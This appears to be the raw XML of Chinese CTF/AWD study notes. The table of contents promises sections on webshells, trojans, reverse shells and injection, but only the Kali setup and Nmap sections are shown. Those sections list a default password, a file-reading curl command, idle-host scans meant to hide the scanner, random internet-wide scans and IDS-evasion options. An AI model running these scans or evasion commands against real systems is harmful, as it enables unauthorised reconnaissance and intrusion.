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928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"1-4"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_Toc2347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AWD</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2347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_Toc11333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一. Kali</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc11333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二. Nmap</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8443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_Toc23229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三. Zenmap</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23229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_Toc4088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四. Burp Suite</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4088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_Toc2610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1.代理设置</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2610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_Toc18804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2.爆破</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18804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_Toc20177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3.配合AntSword（中国蚁剑）文件上传</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20177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（一）文件类型验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20093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_Toc21667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（二）内容验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21667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_Toc21861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 后缀名验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21861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_Toc29040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 空字节截断目录路径</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc29040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_Toc31375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 上传路径验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc31375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_Toc24292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六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</w:rPr>
            <w:t>.htaccess文件绕过检测</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24292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_Toc11388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七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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>权限限制绕过</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc11388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_Toc9949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 内容编码</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9949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_Toc21874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5. 请求格式转换</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21874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五. Joomla</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23291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六. Sqlmap</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc5942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七. Java</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc14834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_Toc20905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1.SQL注入</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20905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_Toc14382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2.命令执行漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc14382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_Toc13137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（一）WSO2漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13137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_Toc20162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3.文件操作漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20162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_Toc19213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4.代码注入漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc19213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_Toc19141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八. Python</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc19141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_Toc3205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python安全应用编程</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3205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（一）正则表达式</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26750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（二）Web编程</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1309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（三）多线程(队列)</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8465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_Toc11631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（四）网络编程</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc11631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_Toc1685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2.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Burp Suite基于python插件开发</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1685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_Toc25493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（一）环境配置</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25493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_Toc10669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（二）Burp Suite使用Python脚本</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc10669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_Toc15566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（三）自定义Burp Suite插件名称</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc15566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_Toc7455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（四）自定义Burp Suite插件并引入到菜单项</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc7455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_Toc4418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（五）自定义Burp Suite插件获取cookies信息</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4418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_Toc3844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（六）自定义Burp Suite插件使用官方文档提供方法</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3844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_Toc31473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（七）自定义Burp Suite插件完全删除所有相关项</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc31473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_Toc27772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（八）自定义Burp Suite插件获取HTTP请求信息</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27772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（九）自定义Burp Suite插件获取HTTP和HTTPS的Host、Port、Protocol</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2324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（十）自定义Burp Suite插件使用本地字典爆破</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27667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_Toc13168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（十一）自定义Burp Suite插件使用Python脚本处理过的本地字典内容爆破</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13168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_Toc31800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（十二） 自定义Web服务&amp;快速找出IP地址泄露</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc31800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_Toc13685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3.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows基于python木马脚本开发</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13685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_Toc15985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（一）简单输出程序及静默化</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc15985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（二）截图程序</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc30491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_Toc15666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4.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>python信息搜集工具开发</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc15666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_Toc6617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（一）高精度字典生成</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6617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（二）指纹识别</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc14732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_Toc12848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九. IDA</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc12848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_Toc5886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1.基本操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc5886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_Toc14998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2.汇编指令</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc14998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_Toc24373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3.ASCII码表</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24373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十. 通防</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc29393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_Toc25735 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:bCs/>
              <w:kern w:val="2"/>
              <w:szCs w:val="24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t>PWN</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25735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_Toc14071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十一. Web代码审计</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc14071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1.PHP</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc351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_Toc29620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2.Python</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc29620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_Toc9209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3.Java</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9209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十二. Diresearch</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18827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_Toc4387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十三. 一句话木马</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4387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_Toc16157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十四. 手写SQL注入</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc16157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_Toc24030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1.json传参形式</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24030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_Toc8899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2.时间盲注脚本</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8899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_Toc24328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十五. Redis</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24328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_Toc32265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十六. Nuclei</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32265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十七. Xray</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1927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_Toc20924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十八. 端口监听反弹shell</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20924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十九. CobaltStrike</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc12418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_Toc18348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二十. Web二进制</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18348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_Toc25773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1.JaveScript反混淆</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25773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_Toc12122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2.PHP扩展逆向</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc12122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_Toc20152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3.字节码恢复</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20152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（一）Python</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1310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（二）Java</w:t>
          </w:r>
          <w:bookmarkStart w:id="104" w:name="_GoBack"/>
          <w:bookmarkEnd w:id="104"/>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc11352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_Toc32662 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve">二十一. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Git_Extract</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32662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_Toc29322 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve">二十二. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>NodeJS原型链污染以及模板注入漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc29322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_Toc15698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二十三. 杂七杂八的东西</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc15698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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc22508"/>
      <w:bookmarkStart w:id="1" w:name="_Toc2347"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AWD</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/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" w:name="_Toc14106"/>
      <w:bookmarkStart w:id="3" w:name="_Toc11333"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="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更新指令apt-get update &amp;&amp; apt-get upgrade &amp;&amp; apt-get dist-upgrade 或者：sudo apt-get update &amp;&amp; sudo apt-get upgrade &amp;&amp; sudo apt-get dist-upgrade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更换到root用户（已知密码）su root 之后输入密码即可 （未知密码）首先sudo passwd之后输入密码kali，然后设置两次一样的新密码，然后su root之后输入新密码即可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2240" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="屏幕截图 2023-06-17 21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06-17 2118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自带的数据库启动，先切换到root用户，mysql -u root -p，之后弹出框输入默认密码为kali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3920" cy="3101340"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="99" name="图片 99" descr="屏幕截图 2023-07-03 22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3-07-03 22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读取文件指令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>curl -X POST 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-d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url=路径名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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="3067050"/>
            <wp:effectExtent l="0" t="0" r="14605" b="11430"/>
            <wp:docPr id="1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全局搜flag内容指令（排除无权限内容）：grep -r flag{ / 2&gt;dev/null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44440" cy="541020"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="19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" w:name="_Toc6171"/>
      <w:bookmarkStart w:id="5" w:name="_Toc8443"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/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扫描：nmap IP地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3901440" cy="1478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端口及服务时根据规范表查询的，规范表在File System-usr-share-nmap文件夹里的nmap-service文件中，可以通过修改该规范表实现指定对照关系为规范查找</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLine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098675"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="12" name="图片 12" descr="屏幕截图 2023-06-18 1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06-18 1200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批量扫描端口1-30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3970020" cy="184404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扫描ip范围的所有端口，按回车会显示执行进度（Ping Scan Timing）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4640580" cy="29489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扫描文件中的IP范围nmap -iL list.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5036820" cy="294894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扫描出包括开启防火墙的端口nmap -F -P0 IP端口 --reason，这里-F是快速扫描（前100个高位端口），-P0实现带防火墙扫描，--reason显示扫描出来的原因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3000" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="5" name="图片 5" descr="屏幕截图 2023-06-17 2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06-17 2102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扫描端口号范围（最大范围1-65535）nmap -P l-65535 IP地址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6700" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="8" name="图片 8" descr="屏幕截图 2023-06-17 2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06-17 2230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寻找空闲主机（僵尸主机）nmap -p80 -open -script ipidseq ip端口范围（-open代表开放状态空闲主机，这里我没有空闲主机）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140" cy="579120"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="9" name="图片 9" descr="屏幕截图 2023-06-17 22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06-17 22453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或者全网扫描nmap -p80 -open -script ipidseq -iR 2000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3460" cy="3025140"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="10" name="图片 10" descr="屏幕截图 2023-06-17 22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06-17 2254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如果说扫出来了空闲主机（显示ipidseq为Incremental的就可以）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860" cy="1082040"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="11" name="图片 11" descr="屏幕截图 2023-06-17 22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06-17 22544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利用空闲主机代替本机扫描（安全，不会暴露当前主机）nmap -Pn -sI 空闲主机IP 目标IP。这样目标主机抓包就只会显示空闲主机IP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扫描端口及版本号nmap -n -sV IP端口（查找对应的规范表是File System-usr-share-nmap文件夹中nmap-service-probes文件）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1851660"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="6" name="图片 6" descr="屏幕截图 2023-06-18 1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06-18 1151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扫描操作系统nmap -O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5840" cy="2979420"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="13" name="图片 13" descr="屏幕截图 2023-06-18 16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06-18 1614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扫描全部信息nmap -A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26865" cy="4521835"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
            <wp:docPr id="17" name="图片 17" descr="屏幕截图 2023-06-18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6-18 1654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38295" cy="4133850"/>
            <wp:effectExtent l="0" t="0" r="6985" b="11430"/>
            <wp:docPr id="16" name="图片 16" descr="屏幕截图 2023-06-18 1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06-18 16543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7035" cy="4382770"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6350"/>
            <wp:docPr id="15" name="图片 15" descr="屏幕截图 2023-06-18 16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06-18 1653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逃逸防火墙以及IDS逃逸nmap --mtu 32 -F -v IP端口（-mtu指定便宜大小，-v提高输出详细度）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29100" cy="3360420"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="18" name="图片 18" descr="屏幕截图 2023-06-18 22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06-18 2244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保存结果到文件中nmap -F -oN 文件名 IP端口，可以保存为txt格式或者xml格式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556760"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="20" name="图片 20" descr="屏幕截图 2023-06-19 16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06-19 16535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保存结果到支持的所有格式文件中nmap -F -oA test IP端口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1600" cy="3451860"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="21" name="图片 21" descr="屏幕截图 2023-06-19 16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06-19 16570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保存结果到支某个文件后面nmap -F -append-output -oN 文件名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65680"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5080"/>
            <wp:docPr id="22" name="图片 22" descr="屏幕截图 2023-06-19 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6-19 1659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" w:name="_Toc30635"/>
      <w:bookmarkStart w:id="7" w:name="_Toc23229"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Zenmap</w:t>
      </w:r>
